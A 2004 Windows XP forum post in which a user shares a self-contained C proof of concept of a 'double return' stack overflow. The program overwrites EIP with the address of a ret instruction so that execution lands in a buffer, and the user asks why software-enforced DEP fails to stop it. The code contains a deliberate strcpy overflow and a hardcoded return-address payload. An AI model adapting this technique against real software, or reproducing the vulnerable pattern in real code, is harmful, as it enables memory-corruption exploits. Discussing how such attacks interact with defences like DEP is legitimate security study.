Software-enforced DEP doesn't work?
WinXPTalk.com Forum Index WinXPTalk.com
Forums for Windows XP users.
 
 FAQFAQ   MemberlistMemberlist     RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 
 
Google
 
Web winxptalk.com
Software-enforced DEP doesn't work?

 
Post new topic   Reply to topic    WinXPTalk.com Forum Index -> Security
Author Message
iDLER
Guest
Posted: Fri Dec 24, 2004 12:05 pm    Post subject: Software-enforced DEP doesn't work? Reply with quote
Hi, Merry Christmas everyone :-)
The following program is a double-ret stack overflow program. It overwrites
the EIP to an address which contains a ret instruction, so the system will
pop the stack again, get the header address of a buffer and jump to it. It
shoud be a 'data execution' but software-enforced DEP does not catch it.:-S
Why?

/*
Stack based overflows
Double return technique
compile for release
*/

void doit(char* buf)
{
char smallbuf[10];
memset(smallbuf,0x0,sizeof(smallbuf));
printf("strcpy\n");

//_asm int 3;
_asm nop;

strcpy(smallbuf,buf);
}

int main(int argc,char *argv[])
{
char buf[100];

printf("+ Stack based overflow\n+ Double return\n");
memset(buf, 0x0, sizeof(buf));

// The double return
memset(buf,0xcc,12); // 12 bytes
strcat(buf,"\x64\x64\x64\x64"); // SET EBP
strcat(buf,"\x3e\x10\x40\x00"); // SET EIP to ret 0x0040103e, at that
address there is a 'ret'
printf("+ Buffer address: %p\n", buf);

doit(buf);

printf("+ done\n");
return 0;
}
Back to top
 
Post new topic   Reply to topic    WinXPTalk.com Forum Index -> Security All times are GMT
Page 1 of 1

 
 You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Office Forums Access Forums Windows Server Exchange Server Help
New Topics Powered by phpBB